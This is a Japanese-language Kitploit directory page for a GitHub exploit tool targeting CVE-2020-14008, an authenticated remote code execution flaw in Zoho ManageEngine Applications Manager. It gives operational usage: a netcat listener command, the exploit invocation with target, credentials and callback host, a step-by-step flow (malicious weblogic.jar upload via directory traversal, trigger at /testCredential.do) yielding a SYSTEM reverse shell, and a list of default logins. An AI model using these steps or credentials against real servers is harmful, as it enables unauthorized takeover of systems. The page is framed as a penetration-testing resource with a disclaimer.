Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-14008 — CVE-2020-14008 - ManageEngine Applications Manager RCE | Kitploit
ツール/GitHubGitHub/0x0d3ad/cve-2020-14008
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツールペイロード開発
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - ManageEngine Applications Manager RCE

リポジトリを見る
314ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-14008 - ManageEngine Applications Manager RCE

Zoho ManageEngine Applications Managerにおける、任意のファイルアップロードを介した認証済みリモートコード実行(バージョン14720以下)。

脆弱性の概要

ツールをダウンロード
詳細値
CVECVE-2020-14008
CVSS7.2 (High)
種類認証済みRCE / 任意ファイルアップロード
製品Zoho ManageEngine Applications Manager
影響を受けるバージョンVersion 14720 and below
必要条件有効な管理者認証情報
結果SYSTEMレベルのリバースシェル

本エクスプロイトは、Weblogic モニター資格情報テスト機能を悪用します。認証された管理者が悪意のある weblogic.jar ファイルを所定の Weblogic ライブラリパスにアップロードします。資格情報テストがトリガーされると、ManageEngine はアップロードされた JAR 内の weblogic.jndi.Environment を JarLoader.loadClass() および newInstance() を介してロードし、任意の Java コードを実行します。

要件

システム

  • Python 3.x
  • Java JDK(javac と jar がPATHに含まれていること)
  • リバースシェルを受信するための nc(netcat)

Python依存関係

root@kitploit:~
pip3 install requests urllib3 lxml

使用方法

1. リスナーを起動

root@kitploit:~
nc -lvnp 1337

2. エクスプロイトを実行

root@kitploit:~
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>

例

root@kitploit:~
# Basic
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

エクスプロイトの流れ

  1. ログイン - 管理者認証情報で認証し、セッションクッキーを取得
  2. 列挙 - ManageEngineのベースインストールディレクトリを取得
  3. JARのビルド - リバースシェルを含む悪意のあるJavaクラス(weblogic.jndi.Environment)をコンパイルしてweblogic.jarを作成
  4. アップロード - ディレクトリトラバーサルを利用してJARをclasses/weblogic/version8/にアップロード(フォールバック:移動するためのスケジュールタスクを作成)
  5. トリガー - /testCredential.do でWeblogicの資格情報テストを呼び出し、悪意のあるクラスをロードしてインスタンス化
  6. シェル - リバースシェルがリスナーに接続

デフォルト認証情報

ユーザー名パスワード
adminadmin
adminpassword
administratoradministrator
guestguest

トラブルシューティング

エラー修正方法
release version 7 not supportedJava 21以降はJava 7ターゲットを廃止しています。スクリプトは--release 8を使用します。
FileNotFoundError: weblogic.jarJARのコンパイルに失敗しました。javacとjarがPATHに含まれているか確認してください。
No valid response from used session認証情報が無効です
Actionname not foundタスクの作成に失敗しました。管理者権限を確認してください。

参照

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • ManageEngine セキュリティ通知

免責事項

このツールは、許可されたペネトレーションテストおよびセキュリティ研究のみを目的として提供されています。自分が所有していない、またはテストする許可を得ていないシステムに対する不正使用は違法です。